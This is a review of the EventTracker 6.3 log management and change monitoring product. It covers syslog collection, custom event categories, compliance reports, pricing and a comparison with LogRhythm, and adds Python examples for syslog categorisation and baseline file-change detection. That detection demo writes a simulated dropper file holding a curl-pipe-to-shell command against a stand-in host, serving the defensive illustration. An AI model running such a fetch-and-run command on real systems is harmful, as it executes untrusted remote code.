Prism Microsystems EventTracker 6.3

EventTracker delivers essential log management and analysis but does combining it with systems monitoring, change management and USB access controls complicate things?

For syslog monitoring we told our switches and security devices to use the EventTracker system as their log destination and we could see from the dashboard that it was receiving this data. We could also see events coming in about logins to monitored systems, hard disks with minimal free space, registry changes, software installs and removals and so on.

We would recommend a reasonably speedy system for EventTracker as it can be quite tedious waiting for it to fill the dashboard with all events for the selected category. The dashboard itself can't be filtered but you do get a slick log search facility, which offers basic and advanced options.

There are plenty of predefined event categories, but you can also create custom ones, setting the event severity, the event and log type, plus the event ID and search strings. These settings make EventTracker quite versatile, as you can create a category to cover almost any type of alert and device. For example, there are preconfigured categories for Cisco PIX devices, which watch for events such as authentication failures, intrusion detection and changes of privileges.
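To make the category mechanism concrete, here is an added example (not EventTracker's own code, and not Prism's category definitions) that models a category the way the review describes it: a severity, a log type, a set of event/message IDs and search strings, matched against incoming syslog lines. The sample lines are constructed in the Cisco PIX syslog format, and the six-digit message IDs and the category names are illustrative assumptions rather than values taken from the product.

```python
"""Category-style matching of syslog lines, modelled on the review's description
of EventTracker custom categories (severity, log type, event ID, search strings).
Added example; sample lines are constructed and the PIX message IDs are assumptions."""
import re
from collections import Counter
from dataclasses import dataclass

# Cisco PIX syslog messages look like "%PIX-<level>-<six-digit id>: <text>".
PIX_RE = re.compile(r"%PIX-(?P<level>\d)-(?P<msgid>\d{6}):\s*(?P<text>.*)")


@dataclass(frozen=True)
class Category:
    name: str
    severity: str        # how the alert is ranked on the dashboard
    log_type: str        # which source family the category applies to
    msg_ids: frozenset   # event IDs to match; empty set means "any ID"
    search: tuple = ()   # substrings that must all appear in the message text

    def matches(self, msgid: str, text: str) -> bool:
        if self.msg_ids and msgid not in self.msg_ids:
            return False
        lowered = text.lower()
        return all(term.lower() in lowered for term in self.search)


# Illustrative categories (assumed IDs, not the product's definitions).
CATEGORIES = [
    Category("PIX: authentication failure", "high", "pix", frozenset({"605004"}), ("login denied",)),
    Category("PIX: privilege change", "high", "pix", frozenset({"502103"})),
    Category("PIX: intrusion detection", "medium", "pix", frozenset(), ("IDS:",)),
]


def parse_pix(line: str):
    """Return (msgid, text) for a PIX-format line, or None for anything else."""
    m = PIX_RE.search(line)
    if not m:
        return None
    return m.group("msgid"), m.group("text")


def categorise(lines, categories=CATEGORIES):
    """Return a list of (category name, severity, msgid) for every matching line.
    A line can hit more than one category, as it would in a category-based SIEM."""
    hits = []
    for line in lines:
        parsed = parse_pix(line)
        if parsed is None:
            continue  # not a PIX message; other log types would need their own parser
        msgid, text = parsed
        for cat in categories:
            if cat.matches(msgid, text):
                hits.append((cat.name, cat.severity, msgid))
    return hits


def summarise(lines, categories=CATEGORIES):
    """Count hits per severity, which is what a dashboard tile would show."""
    return dict(Counter(sev for _, sev, _ in categorise(lines, categories)))


# Constructed sample lines (not captured from a real device).
SAMPLE_LINES = [
    'Jul 28 10:01:02 fw1 %PIX-6-605004: Login denied from 10.0.0.5/51234 to inside:10.0.0.1/ssh for user "admin"',
    'Jul 28 10:01:05 fw1 %PIX-6-605005: Login permitted from 10.0.0.9/51235 to inside:10.0.0.1/ssh for user "ops"',
    "Jul 28 10:02:11 fw1 %PIX-5-502103: User priv level changed: Uname: ops From: 1 To: 15",
    "Jul 28 10:03:40 fw1 %PIX-4-400013: IDS:2003 ICMP redirect from 192.0.2.7 to 10.0.0.1 on interface outside",
    "Jul 28 10:04:00 sw1 %LINK-3-UPDOWN: Interface GigabitEthernet0/1, changed state to down",
]

if __name__ == "__main__":
    for hit in categorise(SAMPLE_LINES):
        print(hit)
    print(summarise(SAMPLE_LINES))
```

The point worth noticing is the combination of an ID filter and a text filter: matching on the message ID alone would fire the authentication category on successful logins too (a neighbouring ID), while matching on text alone is brittle across firmware versions. Running the block lists one hit each for the denied login, the privilege change and the IDS message, and ignores the switch line that is not in PIX format.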

The Reports console provides an absolute heap of predefined reports, including well over 200 for PCI DSS auditing alone. There are SOX and HIPAA reports too, and if that's not enough you also get a wizard to help create custom on-demand and scheduled reports. There's more, as the WhatChanged module keeps you posted on changes to monitored systems, such as critical system changes or files and registry keys being added, deleted or modified.
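The file side of what the WhatChanged module is described as doing comes down to comparing a baseline snapshot against a later one. The following is an added example of that technique in Python, not EventTracker's code: it hashes every file under a directory, takes a second snapshot after some changes, and reports what was added, deleted or modified. Registry keys are out of scope here, and the directory contents are constructed in a temporary location for the demonstration.

```python
"""Baseline-versus-snapshot file change detection, in the spirit of the review's
WhatChanged description. Added example, not the product's implementation;
the files below are constructed in a temporary directory."""
import hashlib
import os
import tempfile


def snapshot(root: str) -> dict:
    """Map each file's path (relative to root, '/'-separated) to its SHA-256.
    Hashing content rather than trusting mtime catches edits that preserve timestamps."""
    digests = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                digest = hashlib.sha256(f.read()).hexdigest()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            digests[rel] = digest
    return digests


def diff_snapshots(baseline: dict, current: dict) -> dict:
    """Classify every path as added, deleted or modified between two snapshots."""
    added = sorted(set(current) - set(baseline))
    deleted = sorted(set(baseline) - set(current))
    modified = sorted(p for p in baseline.keys() & current.keys() if baseline[p] != current[p])
    return {"added": added, "deleted": deleted, "modified": modified}


def _write(root: str, rel: str, content: str) -> None:
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "w") as f:
        f.write(content)


def demo() -> dict:
    """Build a small constructed tree, take a baseline, change it, and diff."""
    with tempfile.TemporaryDirectory() as root:
        _write(root, "etc/hosts", "127.0.0.1 localhost\n")
        _write(root, "bin/tool", "#!/bin/sh\necho ok\n")
        _write(root, "old.cfg", "x=1\n")
        baseline = snapshot(root)

        # Simulated changes: an edited hosts file, a removed config, a new binary.
        _write(root, "etc/hosts", "127.0.0.1 localhost\n203.0.113.9 update.example\n")
        os.remove(os.path.join(root, "old.cfg"))
        _write(root, "bin/dropper", "#!/bin/sh\ncurl http://203.0.113.9/x | sh\n")

        return diff_snapshots(baseline, snapshot(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(kind, paths)
```

Two caveats a practitioner would add before relying on something like this: the baseline itself has to be stored somewhere the monitored host cannot rewrite, otherwise an attacker who gains write access simply re-baselines, and reading whole files into memory is fine for configuration directories but not for large data volumes, where a streaming hash is needed.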

Pricing starts low, with the Small Business Edition costing 3,115 and licensed to monitor ten systems. Move up to fifty monitored systems and the price jumps to 12,466, and support for 100 devices pushes this to nearly 22,000.

If you're in the market for a point solution that focuses purely on log data management then take a closer look at LogRhythm, which costs less for the same number of log sources. However, that's all it does so if you want the extra system monitoring and change management tools plus USB access controls then EventTracker is a worthy candidate.

Verdict

There’s a lot going on with EventTracker and as such it presents a steep learning curve. However, once we’d made it over the hill we found it very capable of making sense of the immense amount of information that log sources can generate. It is more costly than point solutions, but the extra cash gets you very good reporting facilities along with system and change monitoring plus USB access controls.

EventTracker Manager: Windows 2000 and above.

EventTracker Windows Agent: Windows 2000 and above.

EventTracker Solaris Agent: Solaris 9 and 10
